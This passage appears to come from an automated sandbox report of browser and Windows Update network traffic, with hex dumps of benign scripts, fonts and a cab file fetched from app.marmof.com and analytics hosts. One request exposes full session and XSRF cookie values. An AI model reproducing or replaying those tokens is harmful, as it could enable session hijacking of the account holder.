                                                                                                                                              Data Ascii: /*! Build 4715bccd58d99595466a0b6640a356de2767b599:1730734838450 */!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n)
                                                                                                                                              2024-11-06 15:55:24 UTC2777INData Raw: 74 2c 22 70 72 6f 74 6f 74 79 70 65 22 2c 7b 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 2c 65 7d 28 29 2c 42 3d 49 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 5f 72 65 77 61 72 64 66 75 6c 5f 6c 6f 61 64 65 64 29 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 52 65 77 61 72 64 66 75 6c 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 2e 22 29 3b 65 6c 73 65 7b 77 69 6e 64 6f 77 2e 5f 72 65 77 61 72 64 66 75 6c 5f 6c 6f 61 64 65 64 3d 21 30 3b 74 72 79 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 73 63 72 69 70 74 5b 64 61 74 61 2d 72 65 77 61 72 64 66 75 6c 5d 22 29 3b 69 66 28 65 29 7b 77 69 6e 64 6f 77 2e 52 65 77 61 72 64 66 75 6c 3d 4c 2c 4c 2e 73 65 74 75 70
                                                                                                                                              Data Ascii: t,"prototype",{writable:!1}),e}(),B=I;!function(){if(window&&window._rewardful_loaded)console.warn("Rewardful is already loaded.");else{window._rewardful_loaded=!0;try{var e=document.querySelector("script[data-rewardful]");if(e){window.Rewardful=L,L.setup


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              7192.168.2.18497484.245.163.56443
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:24 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1l7r34xy2ECzV4h&MD=O24uwPML HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Accept: */*
                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                              2024-11-06 15:55:24 UTC560INHTTP/1.1 200 OK
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Expires: -1
                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                              MS-CorrelationId: e6487efa-2163-47fd-bb15-45888b3a6b73
                                                                                                                                              MS-RequestId: 4198e4d0-d379-451e-b80e-16999036ae7d
                                                                                                                                              MS-CV: r6vT9CAJrUu6aREj.0
                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:23 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Content-Length: 30005
                                                                                                                                              2024-11-06 15:55:24 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                              2024-11-06 15:55:24 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              8192.168.2.1849752169.150.236.1044432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:24 UTC522OUTGET /js/script.js HTTP/1.1
                                                                                                                                              Host: plausible.io
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://app.marmof.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:24 UTC747INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:24 GMT
                                                                                                                                              Content-Type: application/javascript
                                                                                                                                              Content-Length: 1407
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Server: BunnyCDN-IL1-1206
                                                                                                                                              CDN-PullZone: 682664
                                                                                                                                              CDN-Uid: 153cb5b1-399a-48ef-b5bf-098c03770254
                                                                                                                                              CDN-RequestCountryCode: US
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cache-Control: public, must-revalidate, max-age=86400
                                                                                                                                              application: 127.0.0.1
                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                              permissions-policy: interest-cohort=()
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              CDN-ProxyVer: 1.06
                                                                                                                                              CDN-RequestPullSuccess: True
                                                                                                                                              CDN-RequestPullCode: 200
                                                                                                                                              CDN-CachedAt: 11/06/2024 13:01:02
                                                                                                                                              CDN-EdgeStorageId: 718
                                                                                                                                              CDN-Status: 200
                                                                                                                                              CDN-RequestTime: 0
                                                                                                                                              CDN-RequestId: 8f1de1c92c24a1679ea8378dc9d9073a
                                                                                                                                              CDN-Cache: HIT
                                                                                                                                              2024-11-06 15:55:24 UTC1407INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 74 3d 6f 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2c 72 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 70 69 22 29 7c 7c 6e 65 77 20 55 52 4c 28 74 2e 73 72 63 29 2e 6f 72 69 67 69 6e 2b 22 2f 61 70 69 2f 65 76 65 6e 74 22 2c 6c 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 64 6f 6d 61 69 6e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 29 7b 74 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 49 67 6e 6f 72 69 6e 67 20 45 76 65 6e 74 3a 20 22 2b 74 29 2c 65 26 26 65 2e 63 61 6c 6c 62 61 63 6b 26 26 65 2e 63 61 6c 6c
                                                                                                                                              Data Ascii: !function(){"use strict";var a=window.location,o=window.document,t=o.currentScript,r=t.getAttribute("data-api")||new URL(t.src).origin+"/api/event",l=t.getAttribute("data-domain");function s(t,e){t&&console.warn("Ignoring Event: "+t),e&&e.callback&&e.call


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              9192.168.2.1849755104.26.8.1854432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC382OUTGET /api/?name=A+J&color=ffffff&background=f34b1d HTTP/1.1
                                                                                                                                              Host: ui-avatars.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:25 UTC1196INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              pragma: public
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                              access-control-allow-methods: GET, OPTIONS
                                                                                                                                              access-control-allow-methods: GET, OPTIONS
                                                                                                                                              access-control-max-age: 31536000
                                                                                                                                              access-control-max-age: 31536000
                                                                                                                                              access-control-allow-headers: Content-Type, Accept, X-Requested-With, remember-me, cache-control
                                                                                                                                              access-control-allow-headers: Content-Type, Accept, X-Requested-With, remember-me, cache-control
                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                              expires: Thu, 06 Nov 2025 11:06:47 GMT
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 11:06:47 GMT
                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                              Age: 5319
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g9gpasKzHGkhe2CeP6Vkxu9o53Qi6cJ%2B8GmHoWtIo0qgTa1%2FETfq3M%2B8K1Ky6RteUAnPaD534lDCvxetFhavddDnPwCARLqJpo44ZjVz6y5DBciKMBRMw0%2BjycfUHXrD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6448a78963588-DFW
                                                                                                                                              2024-11-06 15:55:25 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 36 34 26 73 65 6e 74 3d 33 26 72 65 63 76 3d 35 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 35 26 72 65 63 76 5f 62 79 74 65 73 3d 39 36 30 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 34 32 39 35 33 30 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 63 63 66 36 34 34 35 33 33 64 39 36 34 62 61 26 74 73 3d 32 30 34 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                                              Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2835&recv_bytes=960&delivery_rate=2429530&cwnd=251&unsent_bytes=0&cid=bccf644533d964ba&ts=204&x=0"
                                                                                                                                              2024-11-06 15:55:25 UTC576INData Raw: 32 33 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 77 69 64 74 68 3d 22 36 34 70 78 22 20 68 65 69 67 68 74 3d 22 36 34 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 34 20 36 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 3c 72 65 63 74 20 66 69 6c 6c 3d 22 23 66 33 34 62 31 64 22 20 63 78 3d 22 33 32 22 20 77 69 64 74 68 3d 22 36 34 22 20 68 65 69 67 68 74 3d 22 36 34 22 20 63 79 3d 22 33 32 22 20 72 3d 22 33 32 22 2f 3e 3c 74 65 78 74 20 78 3d 22 35 30 25 22 20 79 3d 22 35 30 25 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66
                                                                                                                                              Data Ascii: 239<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="64px" height="64px" viewBox="0 0 64 64" version="1.1"><rect fill="#f34b1d" cx="32" width="64" height="64" cy="32" r="32"/><text x="50%" y="50%" style="color: #f
                                                                                                                                              2024-11-06 15:55:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              10192.168.2.1849753159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC616OUTGET /storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1zl7w0q5nw.woff2 HTTP/1.1
                                                                                                                                              Host: marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://app.marmof.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                              Referer: https://app.marmof.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:25 UTC325INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: font/woff2
                                                                                                                                              Content-Length: 37780
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:28:57 GMT
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66758e29-9394"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:25 UTC16059INData Raw: 77 4f 46 32 00 01 00 00 00 00 93 94 00 12 00 00 00 01 6c b0 00 00 93 26 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 82 55 1b 81 af 0a 1c c6 06 3f 48 56 41 52 89 3f 06 60 3f 53 54 41 54 81 38 00 85 04 2f 6c 11 08 0a 81 a5 50 81 86 7b 0b 85 34 00 30 82 90 66 01 36 02 24 03 8a 64 04 20 05 85 5c 07 20 5b 6e 59 71 02 5b b7 bd 12 87 de ac ea 77 3e 80 02 5f a0 dc 3e c1 6d 83 5c 2e 6f fe e8 99 c9 38 36 01 1b 07 40 cd f0 7e f2 ff ff 27 26 1b 31 dc 81 db 01 c0 3b 7d 55 ab 4a 12 06 8f 40 80 22 cb 44 63 44 ac f8 34 3b 33 b7 7d 1e 67 4f eb 3c 31 ab 98 33 c5 ce 96 cc c9 08 71 dd 89 27 91 08 18 56 c7 a8 a0 07 11 6e e6 7e ac d6 55 dd e5 c8 14 75 05 22 b0 52 34 c6 8e 87 e0 81 8c b2 e1 08 71 2b b7 f9 5a 75 c3 13 ad b1 4d 33 50 99 fa 90 37 45
                                                                                                                                              Data Ascii: wOF2l&U?HVAR?`?STAT8/lP{40f6$d \ [nYq[w>_>m\.o86@~'&1;}UJ@"DcD4;3}gO<13q'Vn~Uu"R4q+ZuM3P7E


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              11192.168.2.1849754159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC1088OUTGET /build/assets/app-49265ad1.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:25 UTC377INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 364728
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-590b8"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:25 UTC16007INData Raw: 63 6f 6e 73 74 20 6f 41 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 2c 73 41 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 2f 62 75 69 6c 64 2f 22 2b 65 7d 2c 79 67 3d 7b 7d 2c 65 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 69 29 7b 69 66 28 21 6e 7c 7c 6e 2e 6c 65 6e 67 74 68 3d 3d 3d 30 29 72 65 74 75 72 6e 20 74 28 29 3b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6c 69 6e 6b 22 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 6e 2e 6d 61 70 28 61 3d 3e 7b 69 66 28 61 3d 73 41 28 61 29 2c 61 20 69 6e 20 79 67 29 72 65 74 75 72 6e 3b 79 67 5b 61 5d 3d 21 30 3b 63 6f 6e 73 74 20 6c 3d 61 2e 65 6e 64 73 57 69 74 68 28 22 2e 63 73 73 22 29 2c 63 3d 6c
                                                                                                                                              Data Ascii: const oA="modulepreload",sA=function(e){return"/build/"+e},yg={},ee=function(t,n,i){if(!n||n.length===0)return t();const s=document.getElementsByTagName("link");return Promise.all(n.map(a=>{if(a=sA(a),a in yg)return;yg[a]=!0;const l=a.endsWith(".css"),c=l
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 29 7b 76 61 72 20 6f 3d 2d 31 2c 75 3d 72 3d 3d 6e 75 6c 6c 3f 30 3a 72 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 74 68 69 73 2e 63 6c 65 61 72 28 29 3b 2b 2b 6f 3c 75 3b 29 7b 76 61 72 20 70 3d 72 5b 6f 5d 3b 74 68 69 73 2e 73 65 74 28 70 5b 30 5d 2c 70 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4f 30 28 29 7b 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 3d 5b 5d 2c 74 68 69 73 2e 73 69 7a 65 3d 30 7d 66 75 6e 63 74 69 6f 6e 20 78 30 28 72 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2c 75 3d 52 75 28 6f 2c 72 29 3b 69 66 28 75 3c 30 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 70 3d 6f 2e 6c 65 6e 67 74 68 2d 31 3b 72 65 74 75 72 6e 20 75 3d 3d 70 3f 6f 2e 70 6f 70 28 29 3a 45 75 2e 63 61 6c 6c 28 6f 2c 75 2c 31 29 2c 2d 2d 74 68 69 73 2e 73 69 7a
                                                                                                                                              Data Ascii: ){var o=-1,u=r==null?0:r.length;for(this.clear();++o<u;){var p=r[o];this.set(p[0],p[1])}}function O0(){this.__data__=[],this.size=0}function x0(r){var o=this.__data__,u=Ru(o,r);if(u<0)return!1;var p=o.length-1;return u==p?o.pop():Eu.call(o,u,1),--this.siz
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 2c 24 3d 4c 3d 3d 22 77 72 61 70 70 65 72 22 3f 47 63 28 45 29 3a 6e 3b 24 26 26 51 63 28 24 5b 30 5d 29 26 26 24 5b 31 5d 3d 3d 28 57 7c 78 7c 46 7c 4d 29 26 26 21 24 5b 34 5d 2e 6c 65 6e 67 74 68 26 26 24 5b 39 5d 3d 3d 31 3f 54 3d 54 5b 48 75 28 24 5b 30 5d 29 5d 2e 61 70 70 6c 79 28 54 2c 24 5b 33 5d 29 3a 54 3d 45 2e 6c 65 6e 67 74 68 3d 3d 31 26 26 51 63 28 45 29 3f 54 5b 4c 5d 28 29 3a 54 2e 74 68 72 75 28 45 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 7a 3d 61 72 67 75 6d 65 6e 74 73 2c 47 3d 7a 5b 30 5d 3b 69 66 28 54 26 26 7a 2e 6c 65 6e 67 74 68 3d 3d 31 26 26 54 65 28 47 29 29 72 65 74 75 72 6e 20 54 2e 70 6c 61 6e 74 28 47 29 2e 76 61 6c 75 65 28 29 3b 66 6f 72 28 76 61 72 20 74 65 3d 30 2c 75 65 3d 75 3f 6f 5b 74
                                                                                                                                              Data Ascii: ,$=L=="wrapper"?Gc(E):n;$&&Qc($[0])&&$[1]==(W|x|F|M)&&!$[4].length&&$[9]==1?T=T[Hu($[0])].apply(T,$[3]):T=E.length==1&&Qc(E)?T[L]():T.thru(E)}return function(){var z=arguments,G=z[0];if(T&&z.length==1&&Te(G))return T.plant(G).value();for(var te=0,ue=u?o[t
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 5f 5f 3d 72 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 45 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 5f 77 72 61 70 70 65 64 5f 5f 3b 69 66 28 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 65 29 7b 76 61 72 20 6f 3d 72 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 61 63 74 69 6f 6e 73 5f 5f 2e 6c 65 6e 67 74 68 26 26 28 6f 3d 6e 65 77 20 57 65 28 74 68 69 73 29 29 2c 6f 3d 6f 2e 72 65 76 65 72 73 65 28 29 2c 6f 2e 5f 5f 61 63 74 69 6f 6e 73 5f 5f 2e 70 75 73 68 28 7b 66 75 6e 63 3a 6a 75 2c 61 72 67 73 3a 5b 74 66 5d 2c 74 68 69 73 41 72 67 3a 6e 7d 29 2c 6e 65 77 20 56 6e 28 6f 2c 74 68 69 73 2e 5f 5f 63 68 61 69 6e 5f 5f 29 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 74 68 72 75 28 74 66 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 45 28 29 7b 72 65 74 75 72 6e 20 6f 68 28
                                                                                                                                              Data Ascii: __=r,o}function tE(){var r=this.__wrapped__;if(r instanceof We){var o=r;return this.__actions__.length&&(o=new We(this)),o=o.reverse(),o.__actions__.push({func:ju,args:[tf],thisArg:n}),new Vn(o,this.__chain__)}return this.thru(tf)}function nE(){return oh(
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 6e 20 72 3d 3d 6e 75 6c 6c 7c 7c 72 21 3d 3d 72 3f 6f 3a 72 7d 76 61 72 20 41 53 3d 79 68 28 29 2c 50 53 3d 79 68 28 21 30 29 3b 66 75 6e 63 74 69 6f 6e 20 67 6e 28 72 29 7b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 70 66 28 72 29 7b 72 65 74 75 72 6e 20 7a 64 28 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 72 3a 6a 6e 28 72 2c 6d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 53 28 72 29 7b 72 65 74 75 72 6e 20 4a 64 28 6a 6e 28 72 2c 6d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 78 53 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 58 64 28 72 2c 6a 6e 28 6f 2c 6d 29 29 7d 76 61 72 20 54 53 3d 4e 65 28 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 6d 61 28 75 2c 72 2c 6f 29
